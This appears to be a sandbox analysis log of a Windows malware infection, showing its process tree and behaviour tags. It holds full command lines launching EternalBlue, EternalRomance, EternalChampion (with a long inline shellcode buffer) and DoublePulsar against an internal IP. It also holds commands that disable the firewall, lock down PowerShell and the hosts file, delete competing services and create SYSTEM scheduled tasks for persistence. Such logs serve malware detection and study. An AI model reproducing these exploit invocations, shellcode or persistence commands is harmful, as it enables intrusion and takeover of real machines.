C:\Windows\SysWOW64\net.exenet stop Bcdefg2⤵PID:1252
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Bcdefg3⤵PID:4804
-
-
-
C:\Windows\SysWOW64\sc.exesc delete Bcdefg2⤵PID:3972
-
-
C:\Windows\SysWOW64\net.exenet stop WSSDPSRVS2⤵PID:3636
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WSSDPSRVS3⤵PID:4896
-
-
-
C:\Windows\SysWOW64\sc.exesc delete SSDPSRVS2⤵PID:3472
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\windows\Installer\conhost.exe2⤵PID:3540
-
C:\windows\Installer\conhost.exeC:\windows\Installer\conhost.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
PID:3340 -
C:\Program Files\Windowsd\Fileftp.exe"C:\Program Files\Windowsd\Fileftp.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Enumerates connected drives
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:928 -
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable5⤵
- Modifies Windows Firewall
PID:3728
-
-
C:\Program Files\Windowsd\Eternalblue-2.2.0.exe"C:\Program Files\Windowsd\Eternalblue-2.2.0.exe" --TargetIp 10.127.0.88 --Target WIN72K8R2 --logfile log.txt5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:5864
-
-
C:\Program Files\Windowsd\Eternalromance-1.4.0.exe"C:\Program Files\Windowsd\Eternalromance-1.4.0.exe" --TargetIp 10.127.0.88 --Target XP_SP0SP1_X86 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --VerifyTarget True --ShellcodeFile shellcode.bin --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 1.txt --logfile log.txt5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:6472
-
-
C:\Program Files\Windowsd\Eternalchampion-2.0.0.exe"C:\Program Files\Windowsd\Eternalchampion-2.0.0.exe" Eternalchampion-2.0.0.exe --TargetIp 10.127.0.88 --Target XP_SP0SP1_X86 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --PipeName browser --VerifyTarget True --ShellcodeBuffer 31C040900F8490060000E800000000586089C389E583EC60648B0D38000000668B4106C1E010668B01662500F08B086681F94D5A74072D00100000EBF08945FC5389C3B9940169E3E8C60100008945F8B9855483F0E8B90100008945F4B92E5B51D2E8AC0100008945ECB9B45CA05BE89F0100008945A45BB91401000029CC890C2454FF55A48B4C24048B54240881C41401000031C080F9067C0680FA027C01408945B88D55E831C9890A526A00526A0BFF55EC8B55E885D20F8450010000526A00FF55F885C00F844201000089C789C66A00FF75E8576A0BFF55EC85C00F852B01000081EFFC00000031C08945B48945B081C71C01000089F8E8C7010000B9FA3CADC239C8742FB91ABD4B2B39C87426B98B2D3D7639C87425B96BDD461F39C8741C8B55E881EA1C0100000F8CDD0000008955E8EBBB8B4FEC894DB4EB068B4FEC894DB0E86502000085C074A456FF55F48B75B489F05050682E6461746A61E88802000085C00F84A20000005883E940E8BB02000085C074158B16C1EA1889F0C1E81839D075078B464885C0740A83C60483E904E378EBD88975F05668F80F00006A00FF55F885C074645089C731C089C16681C10004F3AB5889008B55FC89500431D78B55F889500831D78B55F489500C31D78B55F089501031D78978248B4DB885C97411E89E0100008B55AC8950548B55A889505883C06089C78DB365040000B926020000F3A489C75B897B3889EC61C3535251575589E583EC1889CF89D88945FCE87F00000085C0746E8945F8E8F30000008945F48B45FC8B4DF8E81601000085C074548945F08B45FC8B4DF8E80C01000085C074428945EC8B45FC8B4DF8E80201000085C074308945E88B45FC89F98B55EC8B5DF4E8B000000083F8FF742189C18B45E8E8E40000006689C28B45FC8B4DF0E8DE00000083C4185D5F595A5BC331C0EBF35689C683C63C8B3601C666813E5045750983C6788B3601F05EC331C0EBFA56515789C631C089C7C1E70729C789F831C98A0E80F900740501C846EBE95F595EC356575289C631C089C7C1E70729C789F831D28A1601D046E2EE5A5F5EC356515789C631C089C7C1E70729C789F831C98A0E80F90074C601C84646EBE85F595EC383C0188B00C357565131FF89C639DF74198B04BA01F0E883FFFFFF39C8740747EBEB595E5FC389F8EBF8B8FFFFFFFFEBF183C11C8B0901C8C383C1208B0901C8C383C1248B0901C8C3D1E101C8668B00C381E2FFFF0000C1E20201D18B0901C8C350538B5DB0B9605AB582E87BFEFFFF8B500231C08A0284C075098955AC8945A84088025B58C331C08B4DB485C9740F8B4DB885C974078B4DB085C9740140C352568B74240C8B4C241031D2D1E985C9740CC1C205AC460C2030C249EBF089D05E5AC20800585A5F5E505689F083C63C8B3601C631C089C1668B4E06668B461401C683C61885C9741D8B0639F875078B460439D0740683C62849EBE98B460C8B4E085E01C6C331F6C36031C083F80F741E31C98B3C868B148E39D774034175F30FB694035604000039D1750D40EBDD4139C875056131C040C36131C0C3000102030405060708090A09090D0E8B4C240460E8000000005D6681E500F0894D34E8E5010000E84F010000E88B01000085C00F84E30000008B5D3C8B4BD8E8230100003C23740D3C77741C3CC87422E9B60000008B4D388B452489410E31C0884112E99F000000E81F010000E9B50000008B5D3C8B43E88B303375288B7808337D288B40043345283B431089C3757B8B4D3039F18B452C7418E8FE0000008D4604506A00FF550885C0746389452C89753001DF39F7775329DF01C75789F28B753C8B76F089D9F3A45E89D9C1E9028B5D28311E83C604E2F901D039C67C288B452C6089E650FFD089F461E8AD0000008B4524D1E831C988C101E98B0931C8894524E874000000B010EB08B020EB04B030EB008B4D38B4006601411E8B45108944241C61FF603C8B555485D274058B4D58880A8D45608B4D0C89885301000089A84A01000066B810008B4D386601411E8B45108944241C6168000000008B403C506800000000C331C088C8C1E90800C8C1E90800C8C1E90800C8C3518B452489C10FC9D1E031C889452859C360E80B0000008B45108B483C89483861C3608B5D2C85DB740D31C089DF8B4D30F3AA53FF550C31C089453089452C61C357525689CF8B55448B0AE83900000085C0750E83C2088B0AE82B00000085C07421894D446A0C588D71543B06740783C6043B06750D3B4604750889753C31C040EB0231C05E5A5FC331C039C17D0140C3525131D2668B510201CA3B11740583C104EBF75A8D411C83C00724F88945448B41F889453889D15AC35355575641544155415641574889E54881ECA80000006683E4F0E895040000488945F84889C3B92E5B51D2E8000300004885C00F84890200004889C6B9940169E3E8EA0200004885C00F8473020000488945F04889C7B9855483F0E8D00200004885C00F8459020000488945E8B9B45CA05BE8B90200004885C00F84420200004889458831C0488945A048894598B9140100004829CC890C244889E14883EC2CFF55884883C42C8B4C24048B5424084881C41401000031C080F9067C0780FA027C02FFC089857CFFFFFF4C8D4DD04D31C04C89C1448945D04C89C2B10BFFD6448B45D04585C00F84D60100008B55D04831C9FFD74885C00F84C50100004889C34831C94989C9448B45D04889C2B10BFFD64885C00F85A80100004889DF4881EFF80000004881C7280100008B55D081EA280100000F8C880100008955D04889F8E8F002000089C2B9FA3CADC239CA741DB91ABD4B2B39CA7414B98B2D3D7639CA7415B96BDD461F39CA740CEBB7488B77E8488975A0EB08488B77E848897598E88B01000085C0749C4889D9FF55E8488B45A04831D24889C38B503C4801D04889C64831C94889CA668B4806668B50144801D64883C61848BF2E646174610000004883F9000F84F8000000488B064839F874094883C62848FFC9EBE58B460C8B4E084801C648BBFEFEFEFEFEFEFEFE4883E9084883F9000F8CC6000000488B3E4839DF750C4C8B86980000004D85C074064883C608EBD84883C608488975E04831C9BAF00F0000FF55F04885C00F84900000004989C14831C0B9000400004C89CFF3AB4C89CF4881C788000000488D35130300004831C966B94702F3A44D8909488B5DF8498959084831DF488B5DF0498959104831DF488B5DE8498959184831DF488B5DE0498959204831DF418979448B8D7CFFFFFF85C97417E834000000488B5590498951708B558041899180000000488B45E04883C0704981C1880000004C89084889EC415F415E415D415C5E5F5D5BC353488B5D98B9605AB582E84F0000004885C0741E48634802488D54010731C08A0284C0750B48895590894580FFC088025BC331C048894590894580EBF331C0488B4DA04885C974158B8D7CFFFFFF85C97409488B4D984885C97402FFC0C3535251554889E54881EC00010000574889CF4889D848898500FFFFFFE8BB00000048898508FFFFFFE84801000048898510FFFFFF488B8500FFFFFF488B8D08FFFFFFE89A01000048898518FFFFFF488B8500FFFFFF488B8D08FFFFFFE88F01000048898520FFFFFF488B8500FFFFFF488B8D08FFFFFFE88401000048898528FFFFFF488B8500FFFFFF4889F9488B9520FFFFFF488B9D10FFFFFFE80F01000048898530FFFFFF488B8528FFFFFF488B8D30FFFFFFE8550100006689C2488B8500FFFFFF488B8D18FFFFFFE8490100005F4881C4000100005D595A5BC356574831F68B703C4801C666813E504575124881C6880000004831FF8B3E4801F85F5EC34831C0EBF85651574889C64831C089C7C1E70729C789F831C98A0E80F900740701C848FFC6EBE75F595EC35657524889C64831C089C7C1E70729C789F831D28A1601D048FFC6E2EC5A5F5EC35651574889C64831C089C7C1E70729C789F831C98A0E80F900740A01C848FFC648FFC6EBE45F595EC3564889C64883C6184831C08B065EC35365488B042538000000488B400448C1E80C48C1E00C488B186681FB4D5A7408482D00100000EBEE5BC35756514831FF4889C64831C08B04BA4801F0E840FFFFFF39C8740E48FFC74839DF740BEBE4595E5FC34889F8EBF74831C0EBF2564889C64831C08B411C4801F05EC3564889C64831C08B41204801F05EC3564889C64831C08B41244801F05EC348D1E14801C8668B00C34881CA0000FFFF4881F20000FFFF48C1E2024801D14831D28B114801D0C35756535541544155415641574989E44881EC080100004989CF488D2DE0FFFFFF6681E500F048894D584831D2668B51024801CA483B117406488D4908EBF5488D412848894534488B41F048894528E828010000E88C0100004885C00F84ED0000004C8B6D3C418B4DBCE8F90000003C23740D3C77741D3CC87423E9BD000000488B4D288B454489410EB001884112E9A5000000E8F4000000E99B0000004831DB4831F64831FF498B45D88B188B70048B78088B4D4831CB31CE31CF413B7510757B3B5D54488B454C7416E8E2000000488D53044831C9FF55104889454C895D544885C0745B4801F74839DF774F4829F74801C7574889F151498B75E8F3A45948C1E9025E8B554831164883C604E2F84801D84839C67C21FF554CE8920000008B4544D1E84831C988C14801E98B0931C8894544E843000000B010EB08B020EB04B030EB00488B4D28B4006601411E488B45204C89F94C89E4415F415E415D415C5D5B5E5FFF607831C088C8C1E90800C8C1E90800C8C1E90800C8C3518B454489C10FC9D1E031C889454859C351E81F000000488B4520488B487848894870488B4D704885C974088B8580000000880159C353574883EC28488B5D4C4885DB741331C04889DF4831C98B4D54F3AA4889D9FF55184831C08945544889454C4883C4285F5BC3515657488B7534488B0EE8480000004885C07511488D7608488B0EE8370000004885C0742B48894D346A0C58488DB1900000003B0674084883C6083B0675113B4604750C4889753C4831C048FFC0EB034831C05F5E59C34831C04839C17D0348FFC0C3 --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig 1.txt --logfile log.txt5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:8040
-
-
C:\Program Files\Windowsd\Doublepulsar-1.3.1.exe"C:\Program Files\Windowsd\Doublepulsar-1.3.1.exe" --TargetIp 10.127.0.88 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload x64.dll5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5492
-
-
C:\Program Files\Windowsd\Doublepulsar-1.3.1.exe"C:\Program Files\Windowsd\Doublepulsar-1.3.1.exe" --TargetIp 10.127.0.88 --Protocol SMB --Architecture x86 --Function RunDLL --DllPayload x86.dll5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6112
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c c:\windows\inf\demo1.bat2⤵
- Drops file in Drivers directory
PID:4404 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im powershell.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:220
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3788
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f3⤵PID:560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1544
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r3⤵PID:4784
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4796
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r3⤵PID:2044
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1328
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE3⤵PID:1236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4576
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"3⤵PID:3080
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3020
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d system3⤵PID:4208
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a3⤵
- Modifies file permissions
PID:1520
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:2692
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f3⤵PID:2264
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:5428
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r3⤵PID:5440
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:7312
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r3⤵PID:7352
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:7644
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE3⤵PID:7656
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:7688
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"3⤵PID:7696
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:7716
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system3⤵PID:7724
-
-
C:\Windows\SysWOW64\net.exenet user mm123$ /del3⤵PID:7748
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user mm123$ /del4⤵PID:7764
-
-
-
C:\Windows\SysWOW64\net1.exenet1 user mm123$ /del3⤵PID:7788
-
-
C:\Windows\SysWOW64\net.exenet user mm123$ /del3⤵PID:7804
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user mm123$ /del4⤵PID:7820
-
-
-
C:\Windows\SysWOW64\net1.exenet1 user mm123$ /del3⤵PID:7840
-
-
C:\Windows\SysWOW64\net.exenet user mm123$ /del3⤵PID:7860
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user mm123$ /del4⤵PID:7880
-
-
-
C:\Windows\SysWOW64\net1.exenet1 user mm123$ /del3⤵PID:7916
-
-
C:\Windows\SysWOW64\sc.exesc config Schedule start= auto3⤵
- Launches sc.exe
PID:7944
-
-
C:\Windows\SysWOW64\sc.exesc start Schedule3⤵
- Launches sc.exe
PID:7964
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn AutoKMSK /f3⤵PID:7980
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "Adobe Flash Player Updaters" /f3⤵PID:8008
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 15 /tn "AutoKMSK" /tr "C:\windows\Installer\conhost.exe" /ru "system" /f3⤵
- Creates scheduled task(s)
PID:8032
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /tn "AutoKMSK"3⤵PID:8064
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 35 /tn "AutoKMSKK" /tr "C:\windows\Installer\free.bat" /ru "system" /f3⤵
- Creates scheduled task(s)
PID:8092
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\Drivers\etc\hosts /a3⤵
- Modifies file permissions
PID:8128
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:8144
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\Drivers\etc\hosts /g users:f3⤵PID:8156
-
-
C:\Windows\SysWOW64\attrib.exeattrib -s -h -a -r C:\Windows\system32\Drivers\etc\hosts3⤵
- Views/modifies file attributes
PID:8176
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +a +r C:\Windows\system32\Drivers\etc\hosts3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:7692
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:7732
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\Drivers\etc\hosts /d everyone3⤵PID:7744
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
PID:7772
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\splwow64.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:7828
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:7848
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\splwow64.exe /d everyone3⤵PID:4500
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im splwow64.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7860
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\svchost.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:7944
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:7964
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\svchost.exe /d everyone3⤵PID:7996
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\svchost.exe'" call Terminate3⤵
- Kills process with WMI
- Suspicious use of AdjustPrivilegeToken
PID:8016
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\Fonts\Mysql3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:8080
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:8096
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Fonts\Mysql /d everyone3⤵PID:8092
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\Magnify.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:8144
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:7668
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\System32\Magnify.exe /d everyone3⤵PID:8180
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\sleep.exe /a3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:7708
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:7692
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\sleep.exe /d everyone3⤵PID:4872
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "At1" /f3⤵PID:7736
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "At2" /f3⤵PID:7744
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /delete /tn "\Microsoft\Windows\UPnP\Services" /f3⤵PID:4900
-
-
C:\Windows\SysWOW64\sc.exesc stop EndpointRpc3⤵PID:5084
-
-
C:\Windows\SysWOW64\sc.exesc delete EndpointRpc3⤵PID:4340
-
-
C:\Windows\SysWOW64\sc.exesc stop HEU_KMS_Renewal3⤵
- Launches sc.exe
PID:1940
-
-
C:\Windows\SysWOW64\sc.exesc delete HEU_KMS_Renewal3⤵PID:7748
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im lsaus.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7356
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\system\lsaus.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:7760
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:8184
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system\lsaus.exe /d everyone3⤵PID:7852
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /t /im lsmos.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2240
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\debug\lsmos.exe3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:3956
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1268
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\debug\lsmos.exe /d everyone3⤵PID:7884
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r C:\Windows\Temp\conhost.exe3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1276
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:640
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Temp\conhost.exe /d everyone3⤵PID:568
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\Temp\\conhost.exe'" call Terminate3⤵
- Kills process with WMI
- Suspicious use of AdjustPrivilegeToken
PID:7880
-
-
C:\Windows\SysWOW64\sc.exesc stop xWinWpdSrv3⤵
- Launches sc.exe
PID:7892
-
-
C:\Windows\SysWOW64\sc.exesc delete xWinWpdSrv3⤵
- Launches sc.exe
PID:1624
-
-
C:\Windows\SysWOW64\sc.exesc stop SQLService3⤵PID:8116
-
-
C:\Windows\SysWOW64\sc.exesc delete SQLService3⤵
- Launches sc.exe
PID:4488
-
-
C:\Windows\SysWOW64\sc.exesc stop update3⤵
- Launches sc.exe
PID:3024
-
-
C:\Windows\SysWOW64\sc.exesc delete update3⤵
- Launches sc.exe
PID:2060
-
-
C:\Windows\SysWOW64\sc.exesc stop Microsoft_Update3⤵
- Launches sc.exe
PID:4332
-
-
C:\Windows\SysWOW64\sc.exesc delete Microsoft_Update3⤵
- Launches sc.exe
PID:2352
-
-
C:\Windows\SysWOW64\sc.exesc stop Samserver3⤵
- Launches sc.exe
PID:7960
-
-
C:\Windows\SysWOW64\sc.exesc delete Samserver3⤵
- Launches sc.exe
PID:2544
-
-
C:\Windows\SysWOW64\sc.exesc stop RpcEptManger3⤵
- Launches sc.exe
PID:4548
-
-
C:\Windows\SysWOW64\sc.exesc delete RpcEptManger3⤵
- Launches sc.exe
PID:960
-
-
C:\Windows\SysWOW64\sc.exesc stop MicrosoftFonts3⤵PID:7968
-
-
C:\Windows\SysWOW64\sc.exesc delete MicrosoftFonts3⤵PID:2252
-
-
C:\Windows\SysWOW64\sc.exesc stop WinVMDHCPI3⤵
- Launches sc.exe
PID:2636
-
-
C:\Windows\SysWOW64\sc.exesc delete WinVMDHCPI3⤵PID:7988
-
-
C:\Windows\SysWOW64\sc.exesc stop wmiApServs3⤵
- Launches sc.exe
PID:4480
-
-
C:\Windows\SysWOW64\sc.exesc delete wmiApServs3⤵
- Launches sc.exe
PID:776
-
-
C:\Windows\SysWOW64\sc.exesc stop "Windows TrustedInstaller"3⤵
- Launches sc.exe
PID:2932
-
-
C:\Windows\SysWOW64\sc.exesc delete "Windows TrustedInstaller"3⤵PID:4808
-
-
C:\Windows\SysWOW64\sc.exesc stop COMSysCts3⤵
- Launches sc.exe
PID:4396
-
-
C:\Windows\SysWOW64\sc.exesc delete COMSysCts3⤵
- Launches sc.exe
PID:2324
-
-
C:\Windows\SysWOW64\sc.exesc stop SuperProServer3⤵
- Launches sc.exe
PID:396
-
-
C:\Windows\SysWOW64\sc.exesc delete SuperProServer3⤵
- Launches sc.exe
PID:2160
-
-
C:\Windows\SysWOW64\sc.exesc stop WindosroServert3⤵
- Launches sc.exe
PID:2084
-
-
C:\Windows\SysWOW64\sc.exesc delete WindosroServert3⤵
- Launches sc.exe
PID:4072
-
-
C:\Windows\SysWOW64\sc.exesc stop wmiApSrvs3⤵
- Launches sc.exe
PID:3528
-
-
C:\Windows\SysWOW64\sc.exesc delete wmiApSrvs3⤵PID:3832
-
-
C:\Windows\SysWOW64\sc.exesc stop Abrjkb Dumne3⤵
- Launches sc.exe
PID:5636
-
-
C:\Windows\SysWOW64\sc.exesc delete Abrjkb Dumne3⤵PID:7672
-
-
C:\Windows\SysWOW64\sc.exesc stop Defghiback3⤵PID:4320
-
-
C:\Windows\SysWOW64\sc.exesc delete Defghiback3⤵
- Launches sc.exe
PID:1404
-
-
C:\Windows\SysWOW64\sc.exesc stop RpcEpt3⤵
- Launches sc.exe
PID:4864
-
-
C:\Windows\SysWOW64\sc.exesc delete RpcEpt3⤵PID:2348
-
-
C:\Windows\SysWOW64\sc.exesc stop MicrosoftMysql3⤵
- Launches sc.exe
PID:4968
-
-
C:\Windows\SysWOW64\sc.exesc delete MicrosoftMysql3⤵
- Launches sc.exe
PID:4084
-
-
C:\Windows\SysWOW64\sc.exesc stop MicrosoftMssql3⤵PID:2764
-
-
C:\Windows\SysWOW64\sc.exesc delete MicrosoftMssql3⤵
- Launches sc.exe
PID:1416
-
-
C:\Windows\SysWOW64\sc.exesc stop WmiAppSrv3⤵PID:556
-
-
C:\Windows\SysWOW64\sc.exesc delete WmiAppSrv3⤵
- Launches sc.exe
PID:3200
-
-
C:\Windows\SysWOW64\sc.exesc stop WmiAppSvr3⤵
- Launches sc.exe
PID:4028
-
-
C:\Windows\SysWOW64\sc.exesc delete WmiAppSvr3⤵PID:4992
-
-
C:\Windows\SysWOW64\sc.exesc stop Framework3⤵
- Launches sc.exe
PID:8056
-
-
C:\Windows\SysWOW64\sc.exesc delete Framework3⤵
- Launches sc.exe
PID:8080
-
-
C:\Windows\SysWOW64\sc.exesc stop clr_optimization_v4.0.30318_643⤵PID:8108
-
-
C:\Windows\SysWOW64\sc.exesc delete clr_optimization_v4.0.30318_643⤵
- Launches sc.exe
PID:8140
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:8176
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Windows\tasksche.exe" /d everyone3⤵PID:3532
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4284
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\WmiAppSrv\svchost.exe" /d everyone3⤵PID:4276
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4032
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\WmiAppSvr\svchost.exe" /d everyone3⤵PID:7724
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:4448
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\WmiApprsv\svchost.exe" /d everyone3⤵PID:4644
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:1768
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\WmiAppSrv\csrss.exe" /d everyone3⤵PID:4900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:3824
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\WmiAppSrv\csrss.exe" /d everyone3⤵PID:4340
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"3⤵PID:7764
-
-
